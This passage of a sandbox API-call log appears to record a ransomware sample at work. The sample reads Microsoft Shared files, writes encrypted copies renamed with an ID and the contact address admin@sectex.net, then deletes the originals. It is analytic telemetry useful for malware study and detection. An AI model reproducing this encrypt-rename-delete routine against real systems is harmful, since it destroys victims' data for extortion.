	[0051.378] lstrlenW (lpString=".docx") returned 5
	[0051.378] lstrcmpiW (lpString1=".docx", lpString2="2.HLP") returned -1
	[0051.378] lstrlenW (lpString=".pdf") returned 4
	[0051.378] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1
	[0051.378] lstrlenW (lpString=".xls") returned 4
	[0051.378] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1
	[0051.378] lstrlenW (lpString=".xlsx") returned 5
	[0051.378] lstrcmpiW (lpString1=".xlsx", lpString2="2.HLP") returned -1
	[0051.378] lstrlenW (lpString=".ppt") returned 4
	[0051.378] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1
	[0051.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68
	[0051.378] lstrlenW (lpString=".zip") returned 4
	[0051.378] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1
	[0051.378] lstrlenW (lpString=".rar") returned 4
	[0051.378] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1
	[0051.378] lstrlenW (lpString=".bz2") returned 4
	[0051.378] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1
	[0051.378] lstrlenW (lpString=".7z") returned 3
	[0051.378] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1
	[0051.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68
	[0051.378] lstrlenW (lpString=".dbf") returned 4
	[0051.378] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1
	[0051.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68
	[0051.378] lstrlenW (lpString=".1cd") returned 4
	[0051.378] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1
	[0051.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68
	[0051.378] lstrlenW (lpString=".jpg") returned 4
	[0051.379] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1
	[0051.379] lstrcmpiW (lpString1=".TTF", lpString2=".bot") returned 1
	[0051.379] lstrlenW (lpString="MTEXTRA.TTF") returned 11
	[0051.379] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0051.379] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=7656) returned 1
	[0051.379] CloseHandle (hObject=0x184) returned 1
	[0051.379] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf")) returned 0x20
	[0051.379] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0051.379] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0051.379] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.380] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.380] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0051.380] GetLastError () returned 0x0
	[0051.380] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x1de8, lpOverlapped=0x0) returned 1
	[0051.381] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x1df0, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x1df0, lpOverlapped=0x0) returned 1
	[0051.382] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0051.382] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0051.382] SetEndOfFile (hFile=0x1a8) returned 1
	[0051.383] CloseHandle (hObject=0x1a8) returned 1
	[0051.383] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.383] SetEndOfFile (hFile=0x184) returned 1
	[0051.384] CloseHandle (hObject=0x184) returned 1
	[0051.384] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0051.384] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf")) returned 1
	[0051.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67
	[0051.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67
	[0051.384] lstrlenW (lpString=".doc") returned 4
	[0051.384] lstrcmpiW (lpString1=".doc", lpString2=".TTF") returned -1
	[0051.384] lstrlenW (lpString=".docx") returned 5
	[0051.384] lstrcmpiW (lpString1=".docx", lpString2="A.TTF") returned -1
	[0051.384] lstrlenW (lpString=".pdf") returned 4
	[0051.384] lstrcmpiW (lpString1=".pdf", lpString2=".TTF") returned -1
	[0051.384] lstrlenW (lpString=".xls") returned 4
	[0051.384] lstrcmpiW (lpString1=".xls", lpString2=".TTF") returned 1
	[0051.384] lstrlenW (lpString=".xlsx") returned 5
	[0051.384] lstrcmpiW (lpString1=".xlsx", lpString2="A.TTF") returned -1
	[0051.384] lstrlenW (lpString=".ppt") returned 4
	[0051.384] lstrcmpiW (lpString1=".ppt", lpString2=".TTF") returned -1
	[0051.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67
	[0051.385] lstrlenW (lpString=".zip") returned 4
	[0051.385] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1
	[0051.385] lstrlenW (lpString=".rar") returned 4
	[0051.385] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1
	[0051.385] lstrlenW (lpString=".bz2") returned 4
	[0051.385] lstrcmpiW (lpString1=".bz2", lpString2=".TTF") returned -1
	[0051.385] lstrlenW (lpString=".7z") returned 3
	[0051.385] lstrcmpiW (lpString1=".7z", lpString2="TTF") returned -1
	[0051.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67
	[0051.385] lstrlenW (lpString=".dbf") returned 4
	[0051.385] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1
	[0051.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67
	[0051.385] lstrlenW (lpString=".1cd") returned 4
	[0051.385] lstrcmpiW (lpString1=".1cd", lpString2=".TTF") returned -1
	[0051.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67
	[0051.385] lstrlenW (lpString=".jpg") returned 4
	[0051.385] lstrcmpiW (lpString1=".jpg", lpString2=".TTF") returned -1
	[0051.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67
	[0051.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67
	[0051.385] lstrlenW (lpString=".doc") returned 4
	[0051.385] lstrcmpiW (lpString1=".doc", lpString2=".TTF") returned -1
	[0051.385] lstrlenW (lpString=".docx") returned 5
	[0051.385] lstrcmpiW (lpString1=".docx", lpString2="A.TTF") returned -1
	[0051.385] lstrlenW (lpString=".pdf") returned 4
	[0051.385] lstrcmpiW (lpString1=".pdf", lpString2=".TTF") returned -1
	[0051.385] lstrlenW (lpString=".xls") returned 4
	[0051.385] lstrcmpiW (lpString1=".xls", lpString2=".TTF") returned 1
	[0051.385] lstrlenW (lpString=".xlsx") returned 5
	[0051.385] lstrcmpiW (lpString1=".xlsx", lpString2="A.TTF") returned -1
	[0051.385] lstrlenW (lpString=".ppt") returned 4
	[0051.385] lstrcmpiW (lpString1=".ppt", lpString2=".TTF") returned -1
	[0051.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67
	[0051.385] lstrlenW (lpString=".zip") returned 4
	[0051.385] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1
	[0051.386] lstrlenW (lpString=".rar") returned 4
	[0051.386] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1
	[0051.386] lstrlenW (lpString=".bz2") returned 4
	[0051.386] lstrcmpiW (lpString1=".bz2", lpString2=".TTF") returned -1
	[0051.386] lstrlenW (lpString=".7z") returned 3
	[0051.386] lstrcmpiW (lpString1=".7z", lpString2="TTF") returned -1
	[0051.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67
	[0051.386] lstrlenW (lpString=".dbf") returned 4
	[0051.386] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1
	[0051.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67
	[0051.386] lstrlenW (lpString=".1cd") returned 4
	[0051.386] lstrcmpiW (lpString1=".1cd", lpString2=".TTF") returned -1
	[0051.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67
	[0051.386] lstrlenW (lpString=".jpg") returned 4
	[0051.386] lstrcmpiW (lpString1=".jpg", lpString2=".TTF") returned -1
	[0051.386] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0051.386] lstrlenW (lpString="MSOEURO.DLL") returned 11
	[0051.386] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0051.387] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=31104) returned 1
	[0051.387] CloseHandle (hObject=0x184) returned 1
	[0051.387] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll")) returned 0x20
	[0051.387] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0051.387] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0051.387] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.387] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.387] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0051.387] GetLastError () returned 0x0
	[0051.387] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x7980, lpOverlapped=0x0) returned 1
	[0051.389] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x7990, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x7990, lpOverlapped=0x0) returned 1
	[0051.390] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0051.390] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0051.391] SetEndOfFile (hFile=0x1a8) returned 1
	[0051.391] CloseHandle (hObject=0x1a8) returned 1
	[0051.391] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.391] SetEndOfFile (hFile=0x184) returned 1
	[0051.392] CloseHandle (hObject=0x184) returned 1
	[0051.392] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0051.392] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll")) returned 1
	[0051.392] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63
	[0051.392] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63
	[0051.392] lstrlenW (lpString=".doc") returned 4
	[0051.392] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0051.392] lstrlenW (lpString=".docx") returned 5
	[0051.392] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1
	[0051.392] lstrlenW (lpString=".pdf") returned 4
	[0051.392] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0051.392] lstrlenW (lpString=".xls") returned 4
	[0051.392] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0051.392] lstrlenW (lpString=".xlsx") returned 5
	[0051.392] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1
	[0051.393] lstrlenW (lpString=".ppt") returned 4
	[0051.393] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0051.393] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63
	[0051.393] lstrlenW (lpString=".zip") returned 4
	[0051.393] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0051.393] lstrlenW (lpString=".rar") returned 4
	[0051.393] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0051.393] lstrlenW (lpString=".bz2") returned 4
	[0051.393] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0051.393] lstrlenW (lpString=".7z") returned 3
	[0051.393] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0051.393] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63
	[0051.393] lstrlenW (lpString=".dbf") returned 4
	[0051.393] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0051.393] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63
	[0051.393] lstrlenW (lpString=".1cd") returned 4
	[0051.393] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0051.393] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63
	[0051.393] lstrlenW (lpString=".jpg") returned 4
	[0051.393] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0051.393] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63
	[0051.393] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63
	[0051.393] lstrlenW (lpString=".doc") returned 4
	[0051.393] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0051.393] lstrlenW (lpString=".docx") returned 5
	[0051.393] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1
	[0051.393] lstrlenW (lpString=".pdf") returned 4
	[0051.393] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0051.394] lstrlenW (lpString=".xls") returned 4
	[0051.394] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0051.394] lstrlenW (lpString=".xlsx") returned 5
	[0051.394] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1
	[0051.394] lstrlenW (lpString=".ppt") returned 4
	[0051.394] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0051.394] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63
	[0051.394] lstrlenW (lpString=".zip") returned 4
	[0051.394] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0051.394] lstrlenW (lpString=".rar") returned 4
	[0051.394] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0051.394] lstrlenW (lpString=".bz2") returned 4
	[0051.394] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0051.394] lstrlenW (lpString=".7z") returned 3
	[0051.394] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0051.394] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63
	[0051.394] lstrlenW (lpString=".dbf") returned 4
	[0051.394] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0051.394] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63
	[0051.394] lstrlenW (lpString=".1cd") returned 4
	[0051.394] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0051.394] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63
	[0051.394] lstrlenW (lpString=".jpg") returned 4
	[0051.394] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0051.394] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0051.394] lstrlenW (lpString="msgfilt.dll") returned 11
	[0051.394] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0051.395] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=38768) returned 1
	[0051.396] CloseHandle (hObject=0x184) returned 1
	[0051.396] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll")) returned 0x20
	[0051.396] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0051.396] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0051.396] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.396] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.396] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0051.412] GetLastError () returned 0x0
	[0051.412] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x9770, lpOverlapped=0x0) returned 1
	[0051.414] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x9780, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x9780, lpOverlapped=0x0) returned 1
	[0051.415] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0051.415] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0051.415] SetEndOfFile (hFile=0x1a8) returned 1
	[0051.415] CloseHandle (hObject=0x1a8) returned 1
	[0051.416] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.416] SetEndOfFile (hFile=0x184) returned 1
	[0051.416] CloseHandle (hObject=0x184) returned 1
	[0051.417] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0051.417] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll")) returned 1
	[0051.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66
	[0051.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66
	[0051.417] lstrlenW (lpString=".doc") returned 4
	[0051.417] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0051.417] lstrlenW (lpString=".docx") returned 5
	[0051.417] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1
	[0051.417] lstrlenW (lpString=".pdf") returned 4
	[0051.417] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0051.417] lstrlenW (lpString=".xls") returned 4
	[0051.417] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0051.417] lstrlenW (lpString=".xlsx") returned 5
	[0051.417] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1
	[0051.417] lstrlenW (lpString=".ppt") returned 4
	[0051.417] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0051.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66
	[0051.417] lstrlenW (lpString=".zip") returned 4
	[0051.417] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0051.417] lstrlenW (lpString=".rar") returned 4
	[0051.417] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0051.417] lstrlenW (lpString=".bz2") returned 4
	[0051.417] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0051.418] lstrlenW (lpString=".7z") returned 3
	[0051.418] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0051.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66
	[0051.418] lstrlenW (lpString=".dbf") returned 4
	[0051.418] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0051.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66
	[0051.418] lstrlenW (lpString=".1cd") returned 4
	[0051.418] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0051.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66
	[0051.418] lstrlenW (lpString=".jpg") returned 4
	[0051.418] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0051.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66
	[0051.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66
	[0051.418] lstrlenW (lpString=".doc") returned 4
	[0051.418] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0051.418] lstrlenW (lpString=".docx") returned 5
	[0051.418] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1
	[0051.418] lstrlenW (lpString=".pdf") returned 4
	[0051.418] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0051.418] lstrlenW (lpString=".xls") returned 4
	[0051.418] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0051.418] lstrlenW (lpString=".xlsx") returned 5
	[0051.418] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1
	[0051.418] lstrlenW (lpString=".ppt") returned 4
	[0051.418] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
